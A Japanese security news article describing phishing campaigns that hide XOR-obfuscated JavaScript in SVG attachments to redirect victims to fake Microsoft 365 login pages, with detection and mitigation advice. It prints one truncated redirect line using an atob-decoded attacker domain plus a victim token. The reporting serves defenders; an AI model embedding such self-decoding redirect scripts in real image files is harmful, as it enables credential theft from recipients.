Threat Actors Weaponizing SVG Files to Embed Malicious JavaScript
2025/07/17 CyberSecurityNews — Scalable Vector Graphics (SVG) ファイルを精密誘導型マルウェアへと、脅威アクターたちが巧妙に変貌させている。フィッシング攻撃で配信される、無害に見える “.svg” 形式の悪意の添付ファイルが、メール・フィルターにより静止画像として誤認され、安全のためのメールゲート・ウェイをすり抜けていく。さらに、それらのファイルを受信者がプレビューするだけで、隠された JavaScript がブラウザ内で実行され、目に見えないリダイレクト・チェーンがトリガーされ、攻撃者のインフラへと被害者が誘導されていくという。
標的型の誘導手口
一連のルアー・メールは、1つのアイコンや不在着信の通知などを取り込むという、シンプルな構成である場合が多く、SPF/DKIM/DMARC の適用が遅れている組織が狙われる。署名チェックをすり抜ける悪意の添付ファイルにより、第一線での防御は失敗する。
B2B サービス・プロバイダーや SaaS ベンダーに送信された、ほぼ同一の SVG ファイルを相関分析した結果として、この攻撃の波を、Ontinue のアナリストたちが特定した。クリックごとにワークステーションをマッピングするための、それぞれ対応する Base64 トラッキング文字列が、SVG ファイルに埋め込まれていく。
.webp)
実行ファイルがドロップされないため、エンドポイント・エージェントが検知するのは、通常のブラウザ・アクティビティのみであり、巧妙に細工された Microsoft 365 ライクなポータルにおいて認証情報が窃取されていく。
.webp)
この手口の狙いは、認証情報の窃取に留まらず、より広範かつ戦略的な転換を示している。攻撃者が増大を試みるのは、ブラウザがネイティブにレンダリングする、ファイル形式を武器化する機会である。それにより、ユーザーにマクロやインストーラーを実行させるという、ソーシャル・エンジニアリングにおける障壁を回避している。
実行ファイル/アーカイブ/スクリプトだけに焦点を当てる、従来からのセキュリティ対策では、ピクセル単位で精密にデザインされる、この種の仕掛けを検知することは困難だ。
感染メカニズム:自己デコード型 JavaScript スマグリング
この種の悪意の SVG ファイルは、難読化されたペイロードを <script> タグで囲み、10 Byte の XOR キーでスクリプトをマスクすることで、静的スキャナによる検出を回避する。その一方で、2段階のルーチンにより、実行時にリダイレクトを再構築している。
まず、小さな関数により、暗号化された BLOB を反復処理して平文へと復元する。続いて、Function コンストラクタを悪用して、そのコードをメモリ内で実行する。
復元されたスクリプトは、atob() でデコードされたドメインと、被害者固有のトークンを連結し、強制的にブラウザのナビゲーションを発生させる。
window.location.href = atob(
'aHR0cHM6Ly93dnJ6LmxmdGt2b2cubmV0L...' // domain rotates daily
) + token;
一連のプロセスにおいて、ディスクには何も書き込まれないため、永続性とは無関係なアクティビティとなる。また、ジオフェンシング・ロジックにより、対象地域外のサンドボックスがデータを安全に受信する。
検知と対応の方向性
したがって、脅威の検出において有効な手法は、画像ファイル内に埋め込まれた <script> タグの詳細なコンテンツ検査、または、異常な .svg コマンドライン呼び出しと電子メール・テレメトリの相関関係の調査に限定される。
このような防御のための制御が完全に構築されるまでの間は、迷惑な SVG ファイルを隔離し、CDR (content disarm and reconstruction) を適用し、DMARC ポリシーを “監視” から “拒否” へと変更する必要がある。
SVG ファイルを侵害に使うという、ステガノグラフィ攻撃が検出されているようです。見た目には普通の画像であっても、その背後では JavaScript が動き、認証情報が盗まれていくと、この記事は指摘しています。よろしければ、Steganography で検索も、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.